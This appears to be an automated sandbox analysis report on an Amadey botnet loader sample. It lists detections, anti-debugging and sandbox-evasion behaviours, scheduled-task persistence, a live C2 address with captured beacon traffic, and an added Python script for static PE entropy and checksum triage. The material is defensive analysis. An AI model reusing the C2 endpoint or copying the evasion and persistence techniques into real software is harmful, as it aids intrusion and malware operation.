
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561633
MD5: 6d76634e0d5a3748dbb40ed91d91480a
SHA1: 70fa798c82153db02e218b3a7efa2f56f051cced
SHA256: d99688821d8644f9e44764be9944c327abc3162866e51ad78a02dcdc25a08730
Tags: exe, user-Bitsight

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1548 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6D76634E0D5A3748DBB40ED91D91480A)
    • skotes.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 6D76634E0D5A3748DBB40ED91D91480A)
  • skotes.exe (PID: 4864 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6D76634E0D5A3748DBB40ED91D91480A)
  • skotes.exe (PID: 5588 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6D76634E0D5A3748DBB40ED91D91480A)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source | Rule | Description | Author | Strings
00000003.00000002.2234945312.0000000000D61000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000002.2227793699.0000000000D61000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000003.00000003.2194651545.0000000005580000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000003.2186521563.0000000004850000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
Source | Rule | Description | Author | Strings
0.2.file.exe.b40000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
3.2.skotes.exe.d60000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
6.2.skotes.exe.d60000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
2.2.skotes.exe.d60000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T02:23:07.289907+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.6 | 49852 | 185.215.113.43 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.43/Zu7JuNko/index.php15.113.43a | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000003.00000002.2234945312.0000000000D61000.00000040.00000001.01000000.00000007.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Virustotal: Detection: 54%
Source: file.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49852 -> 185.215.113.43:80
Source: Malware configuration extractor | IPs: 185.215.113.43
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 160 | Cache-Control: no-cache | Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 35 32 44 37 32 42 35 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 | Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB52D72B55182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: Joe Sandbox View | IP Address: 185.215.113.43
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00D6BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile
Source: unknown | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php-
Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php15.113.43a
Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8
Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php:
Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php;
Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpH
Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpL
Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
Source: skotes.exe, 00000006.00000002.3380064228.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpn
Source: skotes.exe, 00000006.00000002.3380064228.0000000001497000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name: .idata
Source: skotes.exe.0.dr | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00DA78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00DA7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00DA8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00D64DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00DA31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00DA2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00D6E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00DA779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00D64B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00D97F36
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9983289339237057
Source: file.exe | Static PE information: Section: iaxkupqh ZLIB complexity 0.9948247839247639
Source: skotes.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9983289339237057
Source: skotes.exe.0.dr | Static PE information: Section: iaxkupqh ZLIB complexity 0.9948247839247639
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 55%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1884672 > 1048576
                    Source: file.exeStatic PE information: Raw size of iaxkupqh is bigger than: 0x100000 < 0x19a600

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.b40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 2.2.skotes.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 3.2.skotes.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 6.2.skotes.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iaxkupqh:EW;fnhucfqp:EW;.taggant:EW;
                    Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                    Source: file.exe | Static PE information: real checksum: 0x1d18cc should be: 0x1dc00d
                    Source: skotes.exe.0.dr | Static PE information: real checksum: 0x1d18cc should be: 0x1dc00d
                    Source: file.exe | Static PE information: section name:
                    Source: file.exe | Static PE information: section name: .idata
                    Source: file.exe | Static PE information: section name:
                    Source: file.exe | Static PE information: section name: iaxkupqh
                    Source: file.exe | Static PE information: section name: fnhucfqp
                    Source: file.exe | Static PE information: section name: .taggant
                    Source: skotes.exe.0.dr | Static PE information: section name:
                    Source: skotes.exe.0.dr | Static PE information: section name: .idata
                    Source: skotes.exe.0.dr | Static PE information: section name:
                    Source: skotes.exe.0.dr | Static PE information: section name: iaxkupqh
                    Source: skotes.exe.0.dr | Static PE information: section name: fnhucfqp
                    Source: skotes.exe.0.dr | Static PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_00D7D91C push ecx; ret 6_2_00D7D92F
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 6_2_053E0DDC push 0000005Bh; retn 0008h 6_2_053E0DE3
                    Source: file.exe | Static PE information: section name: entropy: 7.989396011362113
                    Source: file.exe | Static PE information: section name: iaxkupqh entropy: 7.954913292155413
                    Source: skotes.exe.0.dr | Static PE information: section name: entropy: 7.989396011362113
                    Source: skotes.exe.0.dr | Static PE information: section name: iaxkupqh entropy: 7.954913292155413
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
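                    The static packer indicators listed above (entry point inside .taggant, a stored checksum of 0x1d18cc against a computed 0x1dc00d, sections with empty or random names, section entropy close to 8) can be reproduced from the file on disk without executing it. The script below is an added example, not part of the Joe Sandbox report and not code from the sample; it uses only the Python standard library (no pefile). The PE image it builds at the bottom is constructed for the demo, and its section names (.text, xqzlmf), sizes and addresses are invented, not taken from file.exe or skotes.exe.

```python
"""Static triage for the Data Obfuscation signals above: per-section entropy,
the optional-header CheckSum recomputed, and the section holding the entry
point. Added example on the standard library only (no pefile). Not part of
the Joe Sandbox report or of the sample; the PE image built at the bottom is
constructed for the demo and its section names/sizes are invented."""
import math
import struct

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in [0, 8]; compressed or encrypted payloads sit near 8."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    ent = -sum(c / n * math.log2(c / n) for c in counts if c)
    return 0.0 if ent == 0 else ent


def pe_checksum(data: bytes) -> int:
    """Recompute CheckSum as imagehlp!CheckSumMappedFile does: ones'-complement
    sum of the file in 32-bit words (skipping the CheckSum field itself),
    folded to 16 bits, plus the file length."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    checksum_off = pe_off + 24 + 64       # PE sig(4) + COFF(20) + offset 0x40 in optional header
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)   # fold the carry back in
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def _perms(characteristics: int) -> str:
    bits = ((0x40000000, "R"), (0x80000000, "W"), (0x20000000, "E"))
    return "".join(letter for bit, letter in bits if characteristics & bit)


def triage(data: bytes) -> dict:
    """Parse headers and sections; return the facts a sandbox summary lists."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    entry_rva = struct.unpack_from("<I", data, pe_off + 24 + 16)[0]
    stored = struct.unpack_from("<I", data, pe_off + 24 + 64)[0]
    computed = pe_checksum(data)
    result = {
        "stored_checksum": stored, "computed_checksum": computed,
        "checksum_status": "unset" if stored == 0 else ("ok" if stored == computed else "mismatch"),
        "sections": [], "entry_section": None, "high_entropy": [],
    }
    first = pe_off + 24 + opt_size
    for i in range(nsections):
        raw_name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = SECTION_HDR.unpack_from(data, first + 40 * i)
        name = raw_name.rstrip(b"\0").decode("latin-1")
        ent = round(shannon_entropy(data[rawptr:rawptr + rawsize]), 3)
        result["sections"].append({"name": name, "raw_size": rawsize, "perms": _perms(chars),
                                   "entropy": ent, "printable_name": name != "" and name.isprintable()})
        if vaddr <= entry_rva < vaddr + max(vsize, rawsize):
            result["entry_section"] = name
        if ent >= 7.5:
            result["high_entropy"].append(name)
    return result


def build_demo_pe() -> bytes:
    """Constructed two-section PE32 (not the sample): a flat .text and a
    high-entropy RWX section with a random-looking name holding the entry point."""
    text_body = b"\x90" * 0x200                  # entropy 0.0
    packed_body = bytes(range(256)) * 4          # every byte value 4 times: entropy 8.0
    pe_off = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)   # i386, 2 sections, PE32
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2010)              # AddressOfEntryPoint inside 'xqzlmf'
    struct.pack_into("<I", opt, 28, 0x400000)            # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)      # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x200)      # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                   # Subsystem: Windows GUI
    hdrs = SECTION_HDR.pack(b".text\0\0\0", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    hdrs += SECTION_HDR.pack(b"xqzlmf\0\0", 0x400, 0x2000, 0x400, 0x400, 0, 0, 0, 0, 0xE0000020)
    image = bytearray(dos + b"PE\0\0" + coff + bytes(opt) + hdrs)
    image += b"\0" * (0x200 - len(image)) + text_body + packed_body
    struct.pack_into("<I", image, pe_off + 24 + 64, pe_checksum(bytes(image)))  # write a valid CheckSum
    return bytes(image)


DEMO_PE = build_demo_pe()
TAMPERED_PE = bytearray(DEMO_PE)
TAMPERED_PE[0x410] ^= 0x5A          # one byte patched after linking: stored CheckSum no longer matches
TAMPERED_PE = bytes(TAMPERED_PE)

if __name__ == "__main__":
    for label, img in (("demo", DEMO_PE), ("tampered", TAMPERED_PE)):
        r = triage(img)
        print(label, r["checksum_status"], hex(r["stored_checksum"]), hex(r["computed_checksum"]),
              "entry in:", r["entry_section"], "high entropy:", r["high_entropy"])
        for s in r["sections"]:
            print("  ", s)
```

                    To run it against a real file, replace DEMO_PE with `open(path, "rb").read()` and call `triage()`. Two caveats when reading the output: a stored CheckSum of zero is normal for many unsigned executables and is reported as "unset" rather than as a mismatch, so only a nonzero value that disagrees with the recomputed one (as in the 0x1d18cc versus 0x1dc00d case above) is a signal; and entropy near 8 also occurs in legitimately compressed resources, so it should be read together with the section's permissions (writable and executable) and with where the entry point lands.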

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
